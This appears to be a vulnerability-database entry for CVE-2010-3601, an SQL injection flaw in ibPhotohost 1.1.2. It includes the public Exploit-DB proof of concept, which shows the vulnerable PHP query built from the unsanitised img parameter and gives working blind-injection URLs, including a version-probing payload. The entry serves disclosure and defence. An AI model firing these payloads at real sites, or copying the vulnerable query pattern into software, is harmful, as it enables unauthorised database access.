CVE-2010-3601
high
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
8.5
Description
SQL injection vulnerability in index.php in ibPhotohost 1.1.2 allows remote attackers to execute arbitrary SQL commands via the img parameter.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ibPhotohost 1.1.2 - SQL Injection
#################################################
+
+ Title: ibPhotohost 1.1.2 SQL Injection
+ Author: fred777 - [fred777.5x.to]
+ Link: http://mods.invisionize.com/index.php/f/7609
+ Vuln: index.php?autocom=photohost&CODE=04&img=[SQL Injection]
+ Greetzz to: back2hack,free-hack,hackbase,c-c
+ Contact: nebelfrost77@googlemail.com
+
#################################################
--[ Vuln Code ] --
$id = $this->ipsclass->input['img'];
$this->ipsclass->DB->simple_construct(array(
'select' => '*',
'from' => 'imgupload',
'where' => 'imgupload_id=' . $id,
'order' => 'imgupload_date asc'
));
################################################
--[ Exploitable ]--
http://site/index.php?autocom=photohost&CODE=04&img=[SQL Injection]
http://site/index.php?autocom=photohost&CODE=04&img=1+and+1=1--+ => true
http://site/index.php?autocom=photohost&CODE=04&img=1+and+1=0--+ => false
http://site/index.php?autocom=photohost&CODE=04&img=1+and+substring(version(),1,1)=5
################################################Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| invisionpower | ibphotohost | 1.1.2 | |
References
- http://packetstormsecurity.org/1009-exploits/ibphotohost-sql.txt
- http://www.exploit-db.com/exploits/15070
- http://www.securityfocus.com/bid/43374
- http://www.vupen.com/english/advisories/2010/2437
- http://packetstormsecurity.org/1009-exploits/ibphotohost-sql.txt
- http://www.exploit-db.com/exploits/15070
- http://www.securityfocus.com/bid/43374
- http://www.vupen.com/english/advisories/2010/2437
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.